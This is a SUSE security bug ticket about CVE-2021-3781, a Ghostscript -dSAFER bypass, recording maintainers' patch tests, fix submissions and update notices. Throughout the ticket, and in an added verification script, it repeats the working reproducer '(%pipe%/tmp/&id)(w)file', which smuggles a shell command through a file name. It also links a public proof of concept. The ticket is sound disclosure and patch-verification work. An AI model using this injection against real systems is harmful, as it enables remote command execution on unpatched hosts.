Bug 1190381 - (CVE-2021-3781) VUL-0: CVE-2021-3781: ghostscript: RCE injection
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Version: unspecified
Hardware: Other
OS: Other
Priority: P1 - Urgent
Severity: Major
Assigned To: Security Team bot
https://smash.suse.de/issue/309793/
CVSSv3.1:SUSE:CVE-2021-3781:9.8:(AV:N...
Reported: 2021-09-10 08:48 UTC by Marcus Meissner
Modified: 2022-06-20 14:15 UTC (History)
Description Marcus Meissner 2021-09-10 08:48:02 UTC
https://bugs.ghostscript.com/show_bug.cgi?id=704342

Here's a trivial -dSAFER bypass that allows to execute arbitrary shell commands
in the 9.55 Git version:

# bin/gs -dSAFER
GPL Ghostscript GIT PRERELEASE 9.55.0 (2021-03-30) [...]
GS>(%pipe%/tmp/&id)(w)file
GS<1>sh: 1: /tmp/: Permission denied
uid=0(root) gid=0(root) groups=0(root)

Greetings
Jens
Comment 1 Johannes Meixner 2021-09-10 08:54:11 UTC
CVE-2021-3781 has been assigned to this flaw
see
https://bugs.ghostscript.com/show_bug.cgi?id=704342#c12
Comment 2 Johannes Meixner 2021-09-10 09:03:17 UTC
For SLE15:

A fixed Ghostscript is in IBS
home:jsmeix:branches:SUSE:SLE-15:Update/ghostscript.SUSE_SLE-15_Update

On my SLES15-SP3 test system (KVM virtual machine)
without the fix
--------------------------------------------------------------------------
# gs -dSAFER -sDEVICE=nullpage
GPL Ghostscript 9.52 (2020-03-19)
Copyright (C) 2020 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3 and comes with NO WARRANTY:
see the file COPYING for details.
GS>(%pipe%/tmp/&id)(w)file
GS<1>uid=0(root) gid=0(root) groups=0(root)
sh: /tmp/: Is a directory
quit
--------------------------------------------------------------------------
versus with the fix (long lines shown wrapped here)
--------------------------------------------------------------------------
# gs -dSAFER -sDEVICE=nullpage
GPL Ghostscript 9.52 (2020-03-19)
Copyright (C) 2020 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3 and comes with NO WARRANTY:
see the file COPYING for details.
GS>(%pipe%/tmp/&id)(w)file
Error: /invalidfileaccess in --file--
Operand stack:
   (%pipe%/tmp/&id)   (w)
Execution stack:
   %interp_exit   .runexec2   --nostringval--   --nostringval--
   --nostringval--   2   %stopped_push   --nostringval--
   --nostringval--   %loop_continue   --nostringval--
   --nostringval--   false   1   %stopped_push   .runexec2
   --nostringval--   --nostringval--   --nostringval--   2
   %stopped_push   --nostringval--
Dictionary stack:
   --dict:732/1123(ro)(G)--   --dict:0/20(G)--   --dict:75/200(L)--
Current allocation mode is local
Last OS error: Permission denied
Current file position is 24
GS<2>quit
--------------------------------------------------------------------------
Comment 3 Gabriele Sonnu 2021-09-10 09:07:53 UTC
There is also a PoC on GitHub that uses ImageMagick to trigger the vulnerability [0].

I tried to reproduce it on my SLE-12 (SP3, SP4, SP5), SLE-15 (GA, SP1, SP2, SP3) and openSUSE test system (containers) with no luck.

[0]
https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50
Comment 4 Johannes Meixner 2021-09-10 09:20:12 UTC
Submitted for SLE15:
-------------------------------------------------------------
# osc -A https://api.suse.de mr -m \
 'Ghostscript security fix CVE-2021-3781 (bsc#1190381)' \
 home:jsmeix:branches:SUSE:SLE-15:Update \
 ghostscript.SUSE_SLE-15_Update \
 SUSE:SLE-15:Update
Using target project 'SUSE:Maintenance'.
(release in 'SUSE:SLE-15:Update')
249584
-------------------------------------------------------------
Comment 5 Johannes Meixner 2021-09-10 10:21:46 UTC
For SLE12:

I think I have a fixed Ghostscript in IBS
home:jsmeix:branches:SUSE:SLE-12:Update/ghostscript.SUSE_SLE-12_Update

But I cannot test it on my SLES12 SP5 test system
(KVM virtual machine) because somehow it seems
it does not start to build because since some time

# osc -A https://api.suse.de results -v \
 home:jsmeix:branches:SUSE:SLE-12:Update \
 ghostscript.SUSE_SLE-12_Update

only shows "outdated"
but it doesn't go into "building" state
so I sit and wait...
Comment 7 Johannes Meixner 2021-09-10 11:41:12 UTC
With current Ghostscript 9.54
from the OBS Printing project
on my openSUSE Leap 15.2 laptop
(long lines shown wrapped here):
--------------------------------------------------------------
# gs -dSAFER -sDEVICE=nullpage
GPL Ghostscript 9.54.0 (2021-03-30)
Copyright (C) 2021 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3
and comes with NO WARRANTY:
see the file COPYING for details.
GS>(%pipe%/tmp/&id)(w)file
Error: /ioerror in --file--
Operand stack:
   (%pipe%/tmp/&id)   (w)
Execution stack:
   %interp_exit   .runexec2   --nostringval--   --nostringval--
   --nostringval--   2   %stopped_push   --nostringval--
   --nostringval--   %loop_continue   --nostringval--
   --nostringval--   false   1   %stopped_push   .runexec2
   --nostringval--   --nostringval--   --nostringval--   2
   %stopped_push   --nostringval--
Dictionary stack:
   --dict:726/1123(ro)(G)--   --dict:0/20(G)--   --dict:75/200(L)--
Current allocation mode is local
Last OS error: Cannot allocate memory
Current file position is 24
GS<2>quit
--------------------------------------------------------------
so current Ghostscript 9.54 from OBS Printing project
is not vulnerable with the exact reproducer
because the reproducer fails
with "Error: /ioerror in --file--".

Versus a fixed version with CVE-2021-3781.patch as is from
https://git.ghostscript.com/?p=ghostpdl.git;a=patch;h=a9bd3dec9fde
(long lines shown wrapped here):
--------------------------------------------------------------
# gs -dSAFER -sDEVICE=nullpage
GPL Ghostscript 9.54.0 (2021-03-30)
Copyright (C) 2021 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3
and comes with NO WARRANTY:
see the file COPYING for details.
GS>(%pipe%/tmp/&id)(w)file
Error: /invalidfileaccess in --file--
Operand stack:
   (%pipe%/tmp/&id)   (w)
Execution stack:
   %interp_exit   .runexec2   --nostringval--   --nostringval--
   --nostringval--   2   %stopped_push   --nostringval--
   --nostringval--   %loop_continue   --nostringval--
   --nostringval--   false   1   %stopped_push   .runexec2
   --nostringval--   --nostringval--   --nostringval--   2
   %stopped_push   --nostringval--
Dictionary stack:
   --dict:726/1123(ro)(G)--   --dict:0/20(G)--   --dict:75/200(L)--
Current allocation mode is local
Last OS error: Permission denied
Current file position is 24
GS<2>quit
--------------------------------------------------------------
which looks better because now the reproducer gets rejected
with "Error: /invalidfileaccess in --file--".

Therefore I submitted that fixed version
to the OBS Printing project
and forwarded it to openSUSE:Factory
--------------------------------------------------------------
# osc submitrequest -m \
 'Ghostscript security fix CVE-2021-3781 (bsc#1190381)' \
 home:jsmeix:branches:Printing ghostscript Printing ghostscript
created request id 917941

# osc request accept -m \
 'Ghostscript security fix CVE-2021-3781 (bsc#1190381)' 917941
Result of change request state: ok
openSUSE:Factory
Forward this submit to it? ([y]/n)y
The following submit request is already open: 880734.
Supersede the old request? (y/n/c) n
Ghostscript security fix CVE-2021-3781 (bsc#1190381)
(forwarded request 917941 from jsmeix)
New request # 917942
--------------------------------------------------------------
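Patch-verification check added here (not code from the bug report, from SUSE or from Ghostscript): it classifies a captured gs session by the three outcomes shown in comment 2 (command output vs. /invalidfileaccess) and comment 7 (/ioerror vs. /invalidfileaccess), and the probe function assumes gs is on PATH.

```shell
#!/bin/sh
# Added example, not part of the bug report: classify the outcome of the
# CVE-2021-3781 reproducer from a captured "gs -dSAFER" transcript, using
# the results seen in this bug (comments 2, 7 and 12):
#   vulnerable   - the %pipe% device opened a shell and `id` printed uid=...
#   fixed        - the open was refused with "Error: /invalidfileaccess"
#                  (the 8.62 build in comment 17 reports it in --execute--)
#   inconclusive - the open failed with "Error: /ioerror" (comment 7: the
#                  reproducer did not run, but %pipe% was not rejected either)
classify_gs_output() {
    # $1: full transcript text (stdout and stderr of the gs session)
    case "$1" in
        *"Error: /invalidfileaccess in"*) echo fixed ;;
        *"Error: /ioerror in"*)           echo inconclusive ;;
        *"uid="*"gid="*)                  echo vulnerable ;;
        *)                                echo unknown ;;
    esac
}

# Probe the installed gs with this bug's reproducer (assumption: gs is on
# PATH). On an unfixed build this runs `id` through the %pipe% device, and
# the transcript is read back through classify_gs_output.
probe_installed_gs() {
    command -v gs >/dev/null 2>&1 || { echo "gs not installed"; return 2; }
    out=$(printf '(%%pipe%%/tmp/&id)(w)file\nquit\n' \
          | gs -dSAFER -sDEVICE=nullpage -q 2>&1)
    classify_gs_output "$out"
}

# Constructed sample: the unfixed SLES15-SP3 session from comment 2.
SAMPLE_UNFIXED='GS>(%pipe%/tmp/&id)(w)file
GS<1>uid=0(root) gid=0(root) groups=0(root)
sh: /tmp/: Is a directory
quit'

# Constructed sample: the fixed session, trimmed to its first lines.
SAMPLE_FIXED='GS>(%pipe%/tmp/&id)(w)file
Error: /invalidfileaccess in --file--
Operand stack:
   (%pipe%/tmp/&id)   (w)'

echo "unfixed sample: $(classify_gs_output "$SAMPLE_UNFIXED")"   # vulnerable
echo "fixed sample:   $(classify_gs_output "$SAMPLE_FIXED")"     # fixed
```

Run probe_installed_gs on a test system to get the same one-word verdict for the locally installed package.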
Comment 8 OBSbugzilla Bot 2021-09-10 12:40:06 UTC
This is an autogenerated message for OBS integration:
This bug (1190381) was mentioned in
https://build.opensuse.org/request/show/917942 Factory / ghostscript
Comment 9 Johannes Meixner 2021-09-10 12:53:10 UTC
Continuing "For SLE12" (cf. comment#5):

It seems IBS build status is currently shown "unexpected"
because all except x86_64 switched from "outdated"
to "succeeded" without noticeable "building" in between
but I need x86_64 to be able to test it.

I have no idea how long it may take until also
x86_64 switched from "outdated" to "succeeded".

Because I cannot test it I submit it now "bona fide"
without having it tested myself before on SLE12:
-------------------------------------------------------------
# isc mr -m \
 'Ghostscript security fix CVE-2021-3781 (bsc#1190381)' \
 home:jsmeix:branches:SUSE:SLE-12:Update \
 ghostscript.SUSE_SLE-12_Update \
 SUSE:SLE-12:Update
Using target project 'SUSE:Maintenance'.
(release in 'SUSE:SLE-12:Update')
249602
-------------------------------------------------------------
Comment 10 Johannes Meixner 2021-09-10 12:57:40 UTC
I submitted it for all affected code streams
so I re-assign it to security-team for further processing.
Comment 12 Johannes Meixner 2021-09-13 12:55:38 UTC
Test for SLE12:

On my SLES12-SP5 test system (KVM virtual machine)
without the fix (long lines shown wrapped here)
----------------------------------------------------------------
# gs -dSAFER -sDEVICE=nullpage
GPL Ghostscript 9.52 (2020-03-19)
Copyright (C) 2020 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3
 and comes with NO WARRANTY:
see the file COPYING for details.
GS>(%pipe%/tmp/&id)(w)file
GS<1>uid=0(root) gid=0(root) groups=0(root)
sh: /tmp/: Is a directory
quit
----------------------------------------------------------------
versus with the fix (long lines shown wrapped here)
----------------------------------------------------------------
# gs -dSAFER -sDEVICE=nullpage
GPL Ghostscript 9.52 (2020-03-19)
Copyright (C) 2020 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3
 and comes with NO WARRANTY:
see the file COPYING for details.
GS>(%pipe%/tmp/&id)(w)file
Error: /invalidfileaccess in --file--
Operand stack:
   (%pipe%/tmp/&id)   (w)
Execution stack:
   %interp_exit   .runexec2   --nostringval--   --nostringval--
   --nostringval--   2   %stopped_push   --nostringval--
   --nostringval--   %loop_continue   --nostringval--
   --nostringval--   false   1   %stopped_push   .runexec2
   --nostringval--   --nostringval--   --nostringval--   2
   %stopped_push   --nostringval--
Dictionary stack:
   --dict:732/1123(ro)(G)--   --dict:0/20(G)--   --dict:75/200(L)--
Current allocation mode is local
Last OS error: Permission denied
Current file position is 24
GS<2>quit
----------------------------------------------------------------
i.e. same as the test for SLE15 in comment #2
(as expected because both use same Ghostscript sources).
Comment 13 Swamp Workflow Management 2021-09-15 13:17:50 UTC
# maintenance_jira_update_notice
openSUSE-SU-2021:3044-1: An update that solves one vulnerability and has one errata is now available.

Category: security (critical)
Bug References: 1184123,1190381
CVE References: CVE-2021-3781
JIRA References: 
Sources used:
openSUSE Leap 15.3 (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
Comment 14 Swamp Workflow Management 2021-09-15 13:22:31 UTC
# maintenance_jira_update_notice
SUSE-SU-2021:3044-1: An update that solves one vulnerability and has one errata is now available.

Category: security (critical)
Bug References: 1184123,1190381
CVE References: CVE-2021-3781
JIRA References: 
Sources used:
SUSE Manager Server 4.0 (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Manager Retail Branch Server 4.0 (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Manager Proxy 4.0 (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise Server for SAP 15-SP1 (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise Server for SAP 15 (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise Server 15-SP1-LTSS (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise Server 15-SP1-BCL (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise Server 15-LTSS (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise Module for Desktop Applications 15-SP3 (src):    libspectre-0.2.8-3.12.1
SUSE Linux Enterprise Module for Desktop Applications 15-SP2 (src):    libspectre-0.2.8-3.12.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    ghostscript-9.52-155.1
SUSE Linux Enterprise Module for Basesystem 15-SP2 (src):    ghostscript-9.52-155.1
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE Enterprise Storage 6 (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1
SUSE CaaS Platform 4.0 (src):    ghostscript-9.52-155.1, libspectre-0.2.8-3.12.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 15 Swamp Workflow Management 2021-09-16 13:22:27 UTC
# maintenance_jira_update_notice
openSUSE-SU-2021:1273-1: An update that solves one vulnerability and has one errata is now available.

Category: security (critical)
Bug References: 1184123,1190381
CVE References: CVE-2021-3781
JIRA References: 
Sources used:
openSUSE Leap 15.2 (src):    ghostscript-9.52-lp152.2.7.1, ghostscript-mini-9.52-lp152.2.7.1, libspectre-0.2.8-lp152.4.3.1
Comment 16 Swamp Workflow Management 2021-09-21 20:45:12 UTC
# maintenance_jira_update_notice
SUSE-SU-2021:3180-1: An update that fixes one vulnerability is now available.

Category: security (critical)
Bug References: 1190381
CVE References: CVE-2021-3781
JIRA References: 
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE OpenStack Cloud Crowbar 8 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE OpenStack Cloud 9 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE OpenStack Cloud 8 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE Linux Enterprise Server 12-SP5 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE Linux Enterprise Server 12-SP4-LTSS (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE Linux Enterprise Server 12-SP3-LTSS (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE Linux Enterprise Server 12-SP3-BCL (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1
HPE Helion Openstack 8 (src):    ghostscript-9.52-23.42.1, libspectre-0.2.7-12.12.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 17 Johannes Meixner 2021-10-18 06:43:32 UTC
Only for the log
how it is on my SLES11-SP4 test system (KVM virtual machine)
with ghostscript-library-8.62 as is from SLES11-SP4
(long lines shown wrapped here)
-------------------------------------------------------------
# gs -dSAFER -sDEVICE=nullpage
GPL Ghostscript 8.62 (2008-02-29)
Copyright (C) 2008 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY:
 see the file COPYING for details.
GS>(%pipe%/tmp/&id)(w)file
Error: /invalidfileaccess in --execute--
Operand stack:
   (%pipe%/tmp/&id)   (w)
Execution stack:
   %interp_exit   .runexec2   --nostringval--   --nostringval--
   --nostringval--   2   %stopped_push   --nostringval--
   --nostringval--   %loop_continue   1801   2   3   %oparray_pop
   --nostringval--   --nostringval--   false   1   %stopped_push
   .runexec2   --nostringval--   --nostringval--   --nostringval--
   2   %stopped_push   --nostringval--
Dictionary stack:
   --dict:1164/3371(ro)(G)--   --dict:0/20(G)--   --dict:70/200(L)--
Current allocation mode is local
Last OS error: 2
Current file position is 24
GS<2>quit
-------------------------------------------------------------
Comment 18 Marcus Meissner 2022-06-20 14:15:27 UTC
For SLE11 %pipe% is already protected by -dSAFER.

I mark it as "already fixed" for those.